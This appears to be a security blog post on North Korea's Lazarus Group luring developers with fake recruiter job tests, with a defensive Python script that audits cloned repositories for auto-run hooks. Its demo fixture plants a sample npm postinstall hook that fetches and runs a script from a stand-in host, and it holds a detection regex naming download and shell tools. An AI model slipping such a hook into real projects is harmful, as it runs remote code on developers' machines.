Lazarus APT: North Korea's Evolving Developer Recruitment Tactics

Written by Admin | Jan 16, 2025 9:56:08 AM

The notorious Lazarus Group, a North Korean state-sponsored Advanced Persistent Threat (APT), has once again turned its attention to software developers, this time through fraudulent job offers posted on LinkedIn and aimed at freelance developers.

Their goal? To trick victims into cloning malicious Git repositories filled with malware designed to steal source code, cryptocurrency, and other valuable data.

A Sophisticated Campaign: Operation 99

Dubbed Operation 99, the attack was identified on January 9 by the SecurityScorecard STRIKE team. According to their report, the attackers masquerade as recruiters offering enticing project tests or code reviews. Once a developer engages, they are directed to clone a malicious repository; doing so triggers a connection to a command-and-control (C2) server, which is then used to deliver a series of data-exfiltration tools.
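The report summarised above does not say which mechanism turns "clone this repository" into code execution, so the following is an added illustration rather than SecurityScorecard's tooling or a signature for Operation 99. It assumes the auto-run hooks most commonly abused in developer-targeted lures: npm lifecycle scripts that fire on `npm install`, `setup.py` executed by `pip install .`, and VS Code tasks configured to run when the folder is opened. The script walks a cloned repository and lists every such hook, flagging ones that reach for the network or a shell, so you can read them before running anything. The sample repository it builds is constructed for the demo and is not a real artefact.

```python
"""Pre-flight audit of a freshly cloned repository for code that runs automatically.

Added illustration for this article, not tooling from SecurityScorecard, and it
does not identify Operation 99 payloads. It assumes the common auto-execution
mechanisms (npm lifecycle scripts, setup.py on pip install, VS Code folder-open
tasks); the report does not say which one the campaign used.
"""
import json
import re
import tempfile
from pathlib import Path

# npm runs these on `npm install` without asking.
NPM_LIFECYCLE = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
# Primitives a recruiter's "coding test" has no business putting in an install hook.
SUSPICIOUS = re.compile(
    r"curl|wget|Invoke-WebRequest|powershell|bash -c|base64|eval\(|exec\(|"
    r"child_process|urllib|requests\.|socket",
    re.IGNORECASE,
)


def _flag(cmd: str) -> str:
    return " [SUSPICIOUS]" if SUSPICIOUS.search(cmd) else ""


def check_package_json(repo: Path) -> list[str]:
    """Report npm lifecycle scripts in every package.json outside node_modules."""
    findings = []
    for pj in sorted(repo.rglob("package.json")):
        if "node_modules" in pj.parts:
            continue
        try:
            scripts = json.loads(pj.read_text(encoding="utf-8")).get("scripts", {})
        except (json.JSONDecodeError, OSError, AttributeError):
            continue
        if not isinstance(scripts, dict):
            continue
        for name, cmd in scripts.items():
            if name in NPM_LIFECYCLE:
                findings.append(f"{pj.relative_to(repo)}: npm '{name}' hook: {cmd}{_flag(str(cmd))}")
    return findings


def check_setup_py(repo: Path) -> list[str]:
    """`pip install .` executes setup.py as ordinary Python; flag it if it reaches out."""
    findings = []
    for sp in sorted(repo.rglob("setup.py")):
        try:
            src = sp.read_text(encoding="utf-8")
        except OSError:
            continue
        findings.append(f"{sp.relative_to(repo)}: runs on pip install{_flag(src)}")
    return findings


def check_vscode_tasks(repo: Path) -> list[str]:
    """A task with runOptions.runOn == "folderOpen" runs when the folder is opened and trusted."""
    tasks = repo / ".vscode" / "tasks.json"
    if not tasks.is_file():
        return []
    # tasks.json is JSONC; drop full-line // comments before parsing (good enough for an audit).
    text = re.sub(r"^\s*//.*$", "", tasks.read_text(encoding="utf-8"), flags=re.MULTILINE)
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        return [".vscode/tasks.json: present but not parseable, review by hand"]
    findings = []
    for task in data.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            cmd = str(task.get("command", ""))
            findings.append(f".vscode/tasks.json: task '{task.get('label')}' runs on folder open: {cmd}{_flag(cmd)}")
    return findings


def audit_repo(repo: Path) -> list[str]:
    """Run every check; an empty list means no auto-run hooks were found (not that the repo is safe)."""
    return check_package_json(repo) + check_setup_py(repo) + check_vscode_tasks(repo)


def build_sample_repo(base: Path) -> Path:
    """Constructed sample of what a booby-trapped 'coding test' could look like (not a real artefact)."""
    repo = base / "coding-test"
    (repo / ".vscode").mkdir(parents=True)
    (repo / "package.json").write_text(json.dumps({
        "name": "coding-test",
        "scripts": {
            "test": "jest",
            "postinstall": "node -e \"require('child_process').exec('curl http://example.invalid/s | sh')\"",
        },
    }))
    (repo / ".vscode" / "tasks.json").write_text(
        '// auto-generated\n{"version": "2.0.0", "tasks": [{"label": "init", "type": "shell",'
        ' "command": "bash -c \\"./setup.sh\\"", "runOptions": {"runOn": "folderOpen"}}]}'
    )
    return repo


def demo() -> list[str]:
    """Audit the constructed sample in a temporary directory and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_repo(build_sample_repo(Path(tmp)))


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run it against a real clone with `audit_repo(Path("/path/to/clone"))` before `npm install`, `pip install` or opening the folder in an editor. The list is deliberately narrow: Makefiles, Gradle builds, pre-commit configs and many other files can also execute code, so an empty result is a reason to keep reading, not a clean bill of health.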

The campaign deploys a variety of cross-platform payloads targeting Windows, macOS, and Linux systems. Lazarus uses modular malware components that adapt to specific environments. These components—such as Main99, Payload 99/73, brow99/73, and MCLIP—execute tasks like keylogging, clipboard monitoring, browser credential theft, and exfiltrating sensitive files from development environments.

Targets Beyond Developers: Compromising Entire Ecosystems

The malware not only extracts source code, configuration files, and application secrets but also focuses on cryptocurrency-related assets like wallet keys and mnemonics. These elements are essential for direct financial theft, a known objective of the Lazarus Group to fund North Korea's regime.

This campaign poses a dual threat, targeting not only individual developers but also the wider ecosystems and projects they contribute to. By embedding malware into development workflows, Lazarus aims to compromise entire systems and organisations.

Building on Previous Tactics

This attack strategy isn’t new for Lazarus. The group has a history of targeting software developers, with campaigns like Operation Dream Job in 2021, where fake job offers were sent to specific targets, delivering Trojan malware. Another notable campaign, DEV#POPPER, focused on data theft by luring developers with false job opportunities.

In one infamous case, North Korean operatives infiltrated a cyber security firm, KnowBe4, by convincing them to hire a hacker under the guise of a legitimate candidate. Incidents like these show just how effective these campaigns can be.

While efforts have been made to disrupt North Korea's cyber operations, including a U.S. Department of Justice crackdown in May 2024 that indicted several individuals involved in creating fake freelancer identities, Lazarus continues to adapt and evolve its methods.

Increasing Sophistication with AI and Social Engineering

Operation 99 marks a significant escalation in the group’s sophistication. According to Ryan Sherstobitoff, Senior Vice President of Threat Research and Intelligence at SecurityScorecard, Lazarus now employs AI-generated profiles that appear authentic and highly credible.

"By presenting complete and convincing profiles, they create the illusion of legitimate job opportunities," Sherstobitoff explained. In some instances, Lazarus even compromises existing LinkedIn accounts to enhance their credibility.

The group has also adopted advanced obfuscation and encryption techniques, making their activities harder to detect and analyse.

What Job Seekers Need to Know

As threat actors like Lazarus advance with their tactics, the importance of cyber security awareness becomes paramount. Sherstobitoff emphasised that combating such campaigns requires reinforcing education around social engineering and adhering to basic cyber security principles.

"Always approach job offers or opportunities with skepticism, especially if they seem too good to be true," he advised. He also warned against downloading files, cloning repositories, or engaging with unfamiliar software at the behest of recruiters—particularly when contacted through platforms like LinkedIn.

Staying Vigilant

This latest campaign highlights the growing sophistication of Lazarus Group's operations and their ability to exploit trust through advanced social engineering. Developers and organisations alike must treat unsolicited recruiter contact, and any code it asks them to run, with caution, and strengthen awareness of these threats across their workforce.